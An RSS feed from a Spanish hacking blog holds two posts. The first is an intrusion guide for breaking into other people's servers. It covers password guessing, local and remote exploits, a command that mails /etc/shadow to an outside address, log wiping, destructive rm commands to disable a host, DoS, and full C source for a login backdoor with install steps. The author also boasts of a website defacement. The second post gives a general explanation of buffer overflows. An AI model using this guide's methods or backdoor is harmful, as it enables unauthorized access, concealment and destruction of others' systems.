<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title></title>
	<atom:link href="http://allabouthack.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://allabouthack.wordpress.com</link>
	<description></description>
	<lastBuildDate>Sat, 28 Jan 2012 17:47:24 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='allabouthack.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title></title>
		<link>http://allabouthack.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://allabouthack.wordpress.com/osd.xml" title="" />
	<atom:link rel='hub' href='http://allabouthack.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Guia para entrar en sistemas vulnerables.</title>
		<link>http://allabouthack.wordpress.com/2011/06/09/guia-para-entrar-en-sistemas-vulnerables/</link>
		<comments>http://allabouthack.wordpress.com/2011/06/09/guia-para-entrar-en-sistemas-vulnerables/#comments</comments>
		<pubDate>Thu, 09 Jun 2011 23:29:08 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Hack para novatos]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=165</guid>
		<description><![CDATA[1- Introduccion 2- Como seleccionar un objetivo 3- Determinar que sistema operativo es&#8230; 4- Escanear un site 5- Sacar info de los puertos abiertos y tratar de entrar 6-  Exploits locales y ejemplos. 7-  Exploits remotos y ejemplos 8- Borrado de huellas 9- Como mantener el root(Troyanos) 10- Ataque D.o.S 11- Logs de como el [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=165&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><em>1- Introduccion</em><br />
<em>2- Como seleccionar un objetivo</em><br />
<em>3- Determinar que sistema operativo es&#8230;</em><br />
<em>4- Escanear un site</em><br />
<em>5- Sacar info de los puertos abiertos y tratar de entrar</em><br />
<em>6-  Exploits locales y ejemplos.</em><br />
<em>7-  Exploits remotos y ejemplos</em><br />
<em>8- Borrado de huellas</em><br />
<em>9- Como mantener el root(Troyanos)</em><br />
<em>10- Ataque D.o.S</em><br />
<em>11- Logs de como el Señor X entró a varios lugares.</em><br />
<em>12- Como entre a www.***.com</em><br />
<em>13- ¿Como descubrir exploit locales uno mismo?</em></p>
<p><strong>1- Introduccion</strong></p>
<p>BUeno aquí les dejo el tutorialpara entrar en sistemas vulnerables</p>
<p><strong>2- Como seleccionar un objetivo</strong></p>
<p>Para buscar host www.netcraft.com por ejemplo:</p>
<p>*.edu<br />
*.com<br />
etc&#8230;</p>
<p>Recomendacion: Cuando nos dirigimos a un objetivo en concreto, es conveniento anotar toda la info que se saque del host en un archivo, eso es muy util.<br />
Bueno como principal, para seleccionar un objetivo , tenemos que tener en cuenta varias cosas:<br />
Tenemos alguna shell para hacer login a la victima??<br />
Por que no lo vamos a hacer desde nuestra maquina sin tener una o dos shells , para que no salte nuestra ip.</p>
<p>Luego otro punto es saber de que es la web: Porno (En mi opinion hay que hacerlas mierda) , Alguna compañia , algun site del gobierno, alguna universidad, bueno hay que ver con quien nos metemos no les parece?</p>
<p><strong>3-  Determinar que sistema operativo es&#8230;</strong></p>
<p>Despues de tener en cuenta estas cosas hay que fijarse que sistema operativo usa, para saber con que atacar, por que no es igual un win que un linux, o me equivoco??<br />
Para saber el sistema operativo hay varias maneras:<br />
Una es hacer telnet host 23 , si el admin es muy lamer va a decir el verdadero sistema operativo, pero esto no es de confiar por que hay admins que tienen un dedo de frente y ponen informacion falsa, pero igual ya la opcion de usar telnet en vez de ssh me parece muy dobolu, pero bueno cada loco con su tema.<br />
Otra forma es la de usar el Queso <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  un programa de gran utilidad, o si no ir a www.netcraft.com y ahi fijarse el sistema operativo.<br />
Tambien hay otra forma que es la de sacar el sistema operativo por el lpd, es una forma muy buena, esta forma la podemos encontrar en packetstorm.securify.com (Muy pero muy buen site, muy completo) asi se llama el texto osdetect-lpd.txt , leanlo por que es muy interesante.</p>
<p><strong>4- Escanear un site</strong></p>
<p>Luego de saber que sistema operativo es hay que saber que daemons usa, como hacemos esto, con nuestro gran amigo de aventuras NMAP, que lo bajamos de www.insecure.org/nmap<br />
Entonces que hacemos escaneamos los puertos para saber cual tiene abierto.<br />
Tambien otra cosa que es importante es sacar los ns , por ejemplo esto es muy util para saber<br />
si el ftp, pop , www estan en una misma maquina todos o son varias , esto no va a ayudar a tener una idea del host.<br />
Como hacemos para sacar el ns, de la siguiente manera:<br />
nslookup host.com<br />
con esto nos va a salir el ns por ejemplo: ns1.soyunns.com<br />
Si les interesa un poco mas este tema de sacar los ns y toda esa bola hay un muy buen texto Analisis remoto de sistemas<br />
por Nabster &lt;verdeplanta12@hotmail.com&gt;</p>
<p><strong>5- Sacar info de los puertos abiertos y tratar de entrar</strong></p>
<p>Luego de tenes los puertos que estan abiertos hacemos lo siguiente desde nuestra shell, telnet host puerto<br />
lo que vamos a hacer es conectarnos a todos los puertos que esten abiertos y sacar todas las versiones de los daemons.<br />
por ejemplo:</p>
<p>telnet host 21<br />
telnet host 25<br />
telnet host 79<br />
telnet host 110<br />
telnet host 109<br />
telnet host 143<br />
telnet host 119</p>
<p>etc&#8230;</p>
<p>luego de ya tener toda esa info ya tenemos una idea de que sistema operativo es ,  de los ns, de los puertos, ahora que hacemos ??? ahhh jejeje veamos que utilidad le podemos sacar a cada puerto</p>
<p>Puerto 21 Ftp luego de sacar la versión, ponemos ftp host luego cuando nos aparezca el login ponemos ftp guest , anonymous guest@mishuevos.com , guest anonymous , lo que hacemos es probar si se permite la cuenta de anonymous, si es asi y entramos ponemos ls -a para que nos liste los dir, entonces miramos los permisos de cada dir, si hay permisos de escritura anotamos en que dir, y nos vamos a www.hack.co.za o a packetstorm.securify.com y nos fijamos que exploit hay para esa version.</p>
<p>Puerto 79 El puerto del finger, el admin que tenga este puerto abierto es un verdadero lamah, por que este puerto lo que nos brinda son los usuarios de la maquina y la info de cada usuario, para aprovecharnos de este puerto hacemos lo siguiente, primero nos conectamos telnet host 79<br />
y ponemos /w este comando lo que hace es decirnos quien esta conectado , si el root esta conectado no es conveniente meternos hasta que se vaya, pero lo que hacemos es fijarnos de que host viene el root, si nos dice console es que esta conectado directamente desde la maquina, pero si nos dice un host, es conveniente examinar ese host desde donde viene conectado el root, por que si uno llega a entrar a ese host y saca el root de ese host podemos sacar el pass del root del host donde nosotros queriamos entrar, poniendo un sniffer<br />
Bueno si dice que no hay nadie conectado lo que tenemos que hacer es probar de poner nombres de usuarios por ejemplo: juan , jose , mfernandez, etc&#8230; todo lo que se nos ocurra, si no sacamos ninguno hacemos lo siguiente entramos a la web de ese host y nos fijamos si nos dice algun mail por ejemplo carlos@host.com , si encontramos un mail ya tenemos un user para probar en el finger, entonces lo que hacemos es telnet host finger y luego escribimos carlos + enter y nos fijamos que info sale si nos sale la info del usuario , juntamos toda la info que saquemos de los usuarios y la anotamos por ejemplo:</p>
<p>Trying 200.0.0.0<br />
Connected to host.<br />
Escape character is &#8216;^]&#8217;.<br />
ventas</p>
<p>Welcome to Linux version 2.2.7 at host !</p>
<p>9:10am  up 1 day, 23:56,  2 users,  load average: 0.03, 0.02, 0.00</p>
<p>Login: ***                   Name: **** *****<br />
Directory: /home/ventas                 Shell: /bin/bash<br />
On since Sat Mar  3 09:00 (VET) on ttyp1 from nasa.gov.jejejej<br />
New mail received Fri Mar  2 06:58 2011 (VET)<br />
Unread since Wed Nov 22 13:16 2010 (VET)<br />
No Plan.<br />
Connection closed by foreign host.</p>
<p>user: ***<br />
datos: ***</p>
<p>esta info nos sirve para sacar una shell por ejemplo hay muchos server, generalmente universidades, que tienen muchos usuarios y siempre hay alguno que usa claves faciles , entonces lo que hacemos es<br />
telnet host 23 y cuando nos salga el login probamos todas las posibilidades como por ejemplo:<br />
user: Paco<br />
pass: Peñas</p>
<p>user: Paco<br />
pass: Peñaz</p>
<p>user: Paco<br />
pass: Ppeña</p>
<p>bueno probamos todas las posibilidades imaginables, si logramos entrar bien y sino no hay que desesperarse por que de ultimo recurso se puede concurrir a la fuerza bruta, que es probar con un programa usuarios y claves con una lista de palabras, pero si ya tenemos el usuario ya tenemos la mitad del trabajo echo por que solo nos falta sacar la clave jejeje pequeño detalle.</p>
<p>Puerto 110 es el puerto del pop para explotar alguna vulnerabilidad casi siempre hay que tener una shell si la tenemos , lo que tenemos que hacer es bajarnos el exploit y usarlo y nada mas.</p>
<p>bueno&#8230; y asi hay que hacer sucesivamente con todos los puertos, y hay que probar todos los exploit, si no lo lograron nos quedan todavia opciones no se preocupen.<br />
Se puede escanear los cgi, hay muchos programas para escanear cgi, de nuevo vamos a packetstorm.securify.com y escaneamos todos los posibles cgi si encontramos alguno lo que tenemos que hacer es fijarnos que cgi es y ir a www.hack.co.za o a packetstorm y fijarnos como se explota, un ejemplo:</p>
<p>http://host/cgi-bin/nph-test?*</p>
<p>http://host/cgi-bin/nph-test?/home/*</p>
<p>lo que hace esto es listar directorios.</p>
<p>Si hicimos todo esto y nada funciona no nos desesperemos, por que todavia nos queda una posibilidad pero ya es muy dificil pero muy divertida , esta posibilidad es buscar nuestros exploits, mas adelante voy a explicar como buscar exploit locales, exploit remotos estoy aprendiendo jejeje <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>Ahora digamos que entramos al sistema<br />
Entonces que hacemos ?<br />
Sacar el root<br />
entonces vamos a empezar a trabajar.<br />
Como primer paso ponemos w para saber quien esta en el sistema, si esta el root nos conviene salir y entrar mas tarde.<br />
Si no esta el root hay que sacar el root, entonces hacemos esto:</p>
<p>uname -a que nos va a decir el verdadero S.O , luego de tener esto buscamos los exploits para esas versiones y listo <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p><strong>6- Exploits locales</strong></p>
<p>Una vez dentro de la maquina y sabiendo que sistema operativos es buscamos el exploit remoto una vez que lo tenemos lo tenemos que meter<br />
en la maquina de la siguiente manera</p>
<p>tee cal.sh<br />
luego de hacer eso ponemos<br />
sh cal.sh<br />
para ejecutar el exploit:</p>
<p>137$ sh cal.sh<br />
Host [local] :local<br />
Type a command  (max length=75),  for example   :<br />
&#8220;echo r00t::0:0:Leshka Zakharoff:/:&gt;&gt;/etc/passwd&#8221;<br />
&#8220;mail leshka@leshka.chuvashia.su&lt;/etc/shadow&#8221;<br />
&lt;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;75&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&gt;<br />
&gt;echo r00t::0:0:Leshka Zakharoff:/:&gt;&gt;/etc/passwd</p>
<p>138$ su r00t<br />
# id</p>
<p>uid=0(root) gid=0(root) groups=0(root)</p>
<p>ven que facil<br />
esto conviene probarlo en la maquina de uno y practicar, tambien hay que fijarse bien el codigo del exploit para ver como funciona y para que programa es dirigido para ver si ese programa se encuentra en el sistema.</p>
<p>Vamos a poner otro ejemplo pero ahora con un codigo en c</p>
<p>el exploit es para el vixie-crontab-3.0.1<br />
y funciona en<br />
RedHat Linux 6.0, RedHat Linux 5.2 , RedHat Linux 4.2<br />
S.u.S.E. Linux 6.1 , S.u.S.E. Linux 6.0<br />
entonces que hacemos tee archivo.c<br />
gcc -O2 archivo.c -o archivo<br />
luego ./archivo<br />
crontab ./CrOn<br />
luego esperamos un minuto<br />
y ponemos crontab -r<br />
luego de hacer esto si todo fue bien ya tenemos una shell de root creada, lo que tenemos que hacer es su -l cronexpl y poner el pass que nos dice en el exploit y listo.</p>
<p>facil no?</p>
<p><strong>7- Exploits remotos</strong></p>
<p>Estos quizas les paresca mas dificil de usar por que hay que jugar mucho con el offset a veces.<br />
Vamos a dar un ejemplo de un exploit para el SCO para el httpd<br />
desde nuestra shell subimos el exploit lo compilamos y ponemos lo siguiente:</p>
<p>sonyy:~ # (./s 0;cat) | netcat host 457<br />
id<br />
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)</p>
<p>y listo nos dio una shell nobody</p>
<p>No todos son tan faciles , este que puse es el mas facil de todos, hay otros que hay que jugar mucho con el offset y quizas este parcheado el bug y no funciona.</p>
<p><strong>8- Borrar huellas</strong></p>
<p>Bueno esta es una parte muy importante, de todo por que sin ella nos pueden agarrar, hay que tener en cuenta que si crackear un site lo mas facil es borrar los logs con el comando rm<br />
por ejemplo:</p>
<p>rm /var/log/wtmp<br />
rm /var/log/lastlog<br />
etc&#8230;<br />
y luego para no dejar mal el sistema<br />
tee /var/log/wtmp<br />
tee /var/log/lastlog</p>
<p>pero si queremos conservar el root sin que nos agarren hacemos lo siguiente, tenemos que usar zap, que son programas para borrar huellas editando los logs, esos programas los encontramos en packetstorm.</p>
<p>Tambien hay que borrar o editar el .bash_history o .sh_history<br />
para que no vean lo que hiciste, despues tenemos tambien que borrar<br />
los exploits que subimos.<br />
y listo el crimen perfecto, y si es una pagina porno o algun gov o algun host que quieran crackear hay que buscar el index.html<br />
entonces usamos el comando find.</p>
<p>Ahora digamos que este site es un site de pornografia infantil, y nosotros pensamos que eso esta mal (por lo menos yo si) asi que queremos crackearlo es relativamente facil: podemos hacer todas estas cosas, para que el sistema siga funcionando pero para que no puedan logearse ni arreglar el sistema asi que la unica forma de arreglarlo de reinstalando el sistema.<br />
rm /etc/passwd<br />
rm /etc/shadow<br />
rm /bin/login<br />
rm /bin/rm<br />
rm /etc/inetd.conf<br />
y por ultimo killall login y listo , no mas nos falta cerrar los daemons menos el httpd para que se vea el crack.</p>
<p><strong>9- Como mantener el root(Troyanos)</strong></p>
<p>Bueno digamos que no queremos crackear este sistema , asi que lo que queremos hacer es tener root siempre, sin que nos agarren, sin poner nombre de usuario sin poner clave , sin que nadie en el sistema se de cuenta que hay alguien en el sistema poniendo el comando who<br />
lindo no?<br />
Pudiendo logearse al sistema y si uno quiere poner una clave para que solo uno pueda entrar y que nos de una shell de root cada vez que se lo pedimos.<br />
Bueno entonces a poner un troyano, para poner un troyano hay que tener root.<br />
asi que vamos a usar este troyano:</p>
<p>/*<br />
* Localcore (http://www.localcore.org) login backdoor.<br />
* To trigger, you can either do:<br />
* DISPLAY=MAGIC_WORD; export DISPLAY; telnet target-host<br />
* or<br />
* telnet<br />
* env def DISPLAY MAGIC_WORD<br />
* o target-host<br />
*<br />
* Installation: copy /bin/login to /usr/lib/login , chmod 755 it,<br />
* copy this to /bin/login, chmod 4755 it and touch all timestamps.<br />
*<br />
* Change the MAGIC_WORD and such to taste your fit.<br />
*/</p>
<p>#include &lt;stdio.h&gt;</p>
<p>/* start of user def stuff */<br />
#define OLDLOGIN &#8220;/usr/lib/login&#8221;<br />
#define LOGINNAME &#8220;login&#8221;<br />
#define MAGIC_WORD &#8220;localhost&#8221;</p>
<p>/* end of user def stuff */</p>
<p>/* To make it a bit better looking in strings */</p>
<p>#define REVISION &#8220;$Id: Localcore 2000/08/14 21:31:00 marekm Exp $&#8221;</p>
<p>char **exe;</p>
<p>do_back() {<br />
puts(REVISION);<br />
putenv(&#8220;TERM=vt100&#8243;);<br />
putenv(&#8220;HISTFILE=/dev/null&#8221;);<br />
execl(&#8220;/bin/sh&#8221;,&#8221;sh&#8221;,&#8221;-i&#8221;,0);<br />
}</p>
<p>main(argc, argv)<br />
int argc;<br />
char *argv[];<br />
{<br />
exe = argv;<br />
exe[0] = LOGINNAME;<br />
if ((char *)getenv(&#8220;DISPLAY&#8221;) != (char *)NULL)<br />
if (strncmp(getenv(&#8220;DISPLAY&#8221;),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)<br />
do_back();<br />
execv(OLDLOGIN,exe);<br />
}</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Bueno para poner este exploit tenemos que hacer lo siguiente:<br />
cp /bin/login /usr/lib/login<br />
chmod 755 /usr/lib/login<br />
tee login.c<br />
gcc -O2 login.c -o login<br />
el exploit lo ponemos en /bin/login<br />
chmod 4755 /bin/login<br />
y luego hay que hacer un touch</p>
<p>Bueno lo que hicimos aca fue reemplazar el /bin/login por este troyano.<br />
Si le queremos poner clave tenemos que modificar el codigo del troyano antes de compilarlo,<br />
lo que tenemos que modificar es #define MAGIC_WORD &#8220;localhost&#8221;<br />
en vez de localhost podemos la clave que querramos por ejemplo: Rd2MZ*a2d<br />
linda clave no?? jejeje<br />
Entonces luego de haber puesto el troyano nos salimos del host, habiendo borrado todas las huellas y habiendo dejado el sistema como estaba.<br />
Y desde cualquier terminal ponemos la siguiente sintaxis:</p>
<p>export DISPLAY=&#8221;localhost&#8221;; telnet host</p>
<p>Trying 200.00.00.00&#8230;<br />
Connected to host<br />
Escape character is &#8216;^]&#8217;.</p>
<p>SCO OpenServer(TM) Release 5 (host) (ttyp0)</p>
<p>$Id: Localcore 2000/08/14 21:31:00 marekm Exp $<br />
# id<br />
uid=0(root) gid=3(sys) groups=3(sys),0(root),1(other)<br />
#</p>
<p>aclaracion: ´´localhost´´ es la clave que no definimos, la que viene por default<br />
entonces bueno ya ta tenemos root y nadie nos ve</p>
<p><strong>10- Ataque D.o.S</strong></p>
<p>Bueno el D.o.S son ataques de negacion de servicio, yo solo los practico contra paginas pornograficas, estos son programas como los que se usaron contra yahoo y amazon<br />
lo que se hizo en esa ocacion fue desde varios host poner programas , programados para atacar a una determinada hora en un dia determinado.<br />
para conseguir programas dos http://www.hack.co.za/dos/ddos/index.html<br />
y luego para cada sistema operativo hay un atake distinto.<br />
Bueno no hay mucho que decir en este punto.</p>
<p><strong>11- Logs mios de como entre a varios lugares.</strong></p>
<p>Por ejemplo un ejemplo del finger:</p>
<p>Señor X:~ #  telnet host 79<br />
Trying 200.0.0.0<br />
Connected to host.<br />
Escape character is &#8216;^]&#8217;.<br />
ventas</p>
<p>Welcome to Linux version 2.2.7 at host !</p>
<p>9:10am  up 1 day, 23:56,  2 users,  load average: 0.03, 0.02, 0.00</p>
<p>Login: ventas                           Name: ventas<br />
Directory: /home/ventas                 Shell: /bin/bash<br />
On since Sat Mar  3 09:00 (VET) on ttyp1 from nasa.gov.jejejej<br />
New mail received Fri Mar  2 06:58 2001 (VET)<br />
Unread since Wed Nov 22 13:16 2000 (VET)<br />
No Plan.<br />
Connection closed by foreign host.<br />
Señor X:~ #<br />
Señor X:~ # telnet host<br />
Trying 200.00.00.0.<br />
Connected to host<br />
Escape character is &#8216;^]&#8217;.<br />
Welcome to SuSE Linux 6.1 (i386) &#8211; Kernel 2.2.7 (ttyp2).<br />
host login: ventas<br />
Password:<br />
Have a lot of fun&#8230;<br />
You have new mail.<br />
ventas@host:~ &gt; cd /<br />
ventas@host:/ &gt; cd tmp<br />
ventas@host:/tmp &gt; tee cronexpl.c<br />
ventas@host:/tmp &gt; gcc -O2 cronexpl.c -o cronexpl<br />
ventas@host:/tmp &gt; ./cronexpl<br />
ventas@host:/tmp &gt; crontab ./CrOn<br />
ventas@host:/tmp &gt; crontab -r<br />
ventas@host:/tmp &gt; su -l cronexpl<br />
Password:<br />
host: #</p>
<p>listo root</p>
<p>ven que facil</p>
<p>vamos con otro ejemplo:</p>
<p>host: # (./s 0;cat) | netcat www.fuac.edu.co 457<br />
id<br />
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)</p>
<p>bueno listo<br />
ahora ya saben como funciona la cosa.</p>
<p><strong>12- Como entre a www.***.com</strong></p>
<p>Bueno aunque no lo crean fue muy facil, escanee los puertos , y encontre un bug en el rpc, esto no se lo dije a nadie hasta que lo parchee , ahora ya no funciona <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  por lo menos el que yo use.<br />
luego cambie la web, borre las huellas y crackee todos los pass: root etc&#8230; muy faciles<br />
y luego me sali, no puse troyano ni nada , y la segunda vez que lo crackee use un exploit remoto que me dio una nobody y despues use un exploit local obtuve el root y luego seguí el mismo procedimiento.<br />
La verdad ese admin no tiene ni puta idea de nada.</p>
<p><strong>13- ¿Como descubrir exploit locales uno mismo?</strong></p>
<p>Bueno esto es un tema apasionante , lo voy a tratar muy por arriba</p>
<p>Hay que aclarar que para conseguir una shell root el programa tiene que tener SUID, para saber que programa tiene suid se pueden bajar el programa check.pl de freshmeat.net<br />
Ese programa es muy bueno<br />
Bueno luego de saber que programas tienen SUID, hay que empezar a jugar con cada uno hasta que alguno cree un core.<br />
como hacemos esto? con la siguiente sintaxis:</p>
<p>programa -language `perl -e &#8216;print &#8220;A&#8221;x1200&#8242;`</p>
<p>si esto sirve nos va a tirar un core</p>
<p>entonces ponemos gdb programa core<br />
luego ponemos info registers<br />
Y nos tiene que aparecer eip 4141414141<br />
si nos aparece esto quiere decir que sobreescribe la pila<br />
ahora lo que hay que hacer es hacer el exploit.<br />
Si no saben programar o estan aprendiendo pueden hacer lo siguiente<br />
bajarse exploit de www.hack.co.za y mirarlos y poner el programa de ustedes y empezar a jugar, antes hay que leer</p>
<p>Nabster.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/165/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/165/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/165/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=165&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2011/06/09/guia-para-entrar-en-sistemas-vulnerables/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>Ataques basados en Desbordamiento de Buffer (Buffer Overflow)</title>
		<link>http://allabouthack.wordpress.com/2011/06/09/ataques-basados-en-desbordamiento-de-buffer-buffer-overflow/</link>
		<comments>http://allabouthack.wordpress.com/2011/06/09/ataques-basados-en-desbordamiento-de-buffer-buffer-overflow/#comments</comments>
		<pubDate>Thu, 09 Jun 2011 22:19:28 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Hack para novatos]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=158</guid>
		<description><![CDATA[&#8220;Los ataques por desbordamiento de búfer&#8221; (también denominado saturación de búfer) están diseñados para activar la ejecución de un código arbitrario en un programa al enviar un caudal de datos mayor que el que puede recibir. Los programas que admiten datos de entrada con parámetros, los almacenan temporalmente en una zona de la memoria denominada [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=158&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p align="justify">&#8220;Los ataques por <strong>desbordamiento de búfer</strong>&#8221; (también denominado <em>saturación de búfer</em>) están diseñados para activar la ejecución de un código arbitrario en un programa al enviar un caudal de datos mayor que el que puede recibir.</p>
<p align="justify">Los programas que admiten datos de entrada con parámetros, los almacenan temporalmente en una zona de la memoria denominada <em>búfer</em>. Pero algunas funciones de lectura, como las <em>strcpy()</em> del <a href="http://es.kioskea.net/contents/c/cintro.php3">lenguaje C</a>, no admiten este tipo de desbordamiento y causan el bloqueo de la aplicación, lo que puede provocar la ejecución del código arbitrario y permitir el acceso al sistema.</p>
<p align="justify">La implementación de este tipo de ataques es extremadamente complicada ya que requiere un conocimiento exhaustivo de la arquitectura del programa y del procesador. Sin embargo, existen varios <a href="http://es.kioskea.net/contents/attaques/exploits.php3">puntos vulnerables</a> capaces de automatizar este tipo de ataques y de hacerlos accesibles para aquellos que son casi inexpertos. <a name="principe"></a></p>
<h2>Funcionamiento básico</h2>
<p align="justify">El principio operativo de un desbordamiento de búfer guarda una relación muy estrecha con la arquitectura del procesador en la que se ejecuta una aplicación vulnerable.</p>
<p align="justify">Los datos ingresados en una aplicación se almacenan en la memoria de acceso aleatorio en una zona que se conoce como <em>búfer</em>. Un programa con un diseño correcto debería estipular un tamaño máximo para los datos de entrada y garantizar que no superen ese valor.</p>
<p align="justify">Las instrucciones y los datos de un programa en ejecución se almacenan temporalmente en forma adyacente en la memoria, en una zona llamada <em>pila</em>. Los datos ubicados después del búfer contienen una dirección de retorno (que se denomina <em>puntero de instrucción</em>) que le permite al programa continuar su tiempo de ejecución. Si el tamaño de los datos es mayor que el del búfer, la dirección de retorno se sobrescribe y el programa leerá una dirección de memoria no válida generando una <em>violación de segmento</em> en la aplicación.</p>
<p align="justify">Un pirata informático con un sólido conocimiento técnico puede asegurarse de que la dirección de memoria sobrescrita corresponda a una real, por ejemplo, una que esté ubicada en el mismo búfer. Como tal, al ingresar las instrucciones en el búfer (el código arbitrario), es fácil para él ejecutar este procedimiento.</p>
<p align="justify">Por lo tanto, es posible incluir instrucciones en el búfer que permitan abrir un intérprete de comandos (<em>shell</em>) permitiendo que el pirata tome control del sistema. Este código arbitrario que posibilita la ejecución del intérprete de comandos se conoce como <em>código de shell</em> o <em>shellcode</em>. <a name="proteger"></a></p>
<h2>Protección contra el desbordamiento de búfer</h2>
<p align="justify">Para protegerse contra este tipo de ataques, es importante desarrollar aplicaciones que utilicen lenguajes de programación avanzados que garanticen una administración precisa de la memoria asignada o que usen un lenguaje de bajo nivel con bibliotecas de función seguras (por ejemplo, las funciones <em>strncpy()</em>).</p>
<p>Los boletines de alerta se publican con frecuencia y advierten sobre la vulnerabilidad de ciertas aplicaciones a los ataques por desbordamiento de búfer. Después de su publicación, los editores de software afectados por la vulnerabilidad generalmente publican <em>revisiones</em> (<em>patch</em>) para corregir el problema. Es recomendable que todos los administradores de sistema y red se mantengan informados acerca de las alertas de seguridad y que apliquen las revisiones lo antes posible.</p>
<p>&nbsp;</p>
<p><em><strong>Nabster.</strong></em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/158/" /></a> <img alt="" border="0" 